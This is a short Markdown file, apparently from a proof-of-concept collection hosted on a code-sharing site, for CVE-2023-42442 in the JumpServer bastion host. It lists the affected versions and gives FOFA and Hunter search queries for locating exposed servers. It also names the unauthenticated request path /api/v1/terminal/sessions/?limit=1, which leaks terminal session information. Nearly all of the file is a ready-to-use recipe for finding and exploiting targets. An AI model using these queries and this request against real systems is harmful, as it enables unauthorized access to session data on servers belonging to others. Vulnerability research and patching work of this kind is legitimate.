POC/wpoc/JumpServer/JumpServer未授权漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

23 lines
484 B
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

## CVE-2023-42442
## 影响版本
3.0.0 <= JumpServer <= 3.5.4
3.6.0 <= JumpServer <= 3.6.3
## fofa
```
icon_hash="-1162630024"
```
## Hunter
```
app.name="JumpServer"
```
## POC
JumpServer 是一款开源的堡垒机。 在JumpServer受影响版本中由于/api/v1/terminal/sessions/接口没有添加权限认证,未授权的攻击者可以通过访问/api/v1/terminal/sessions/?limit=1获取堡垒机terminal的session信息
```
/api/v1/terminal/sessions/?limit=1
```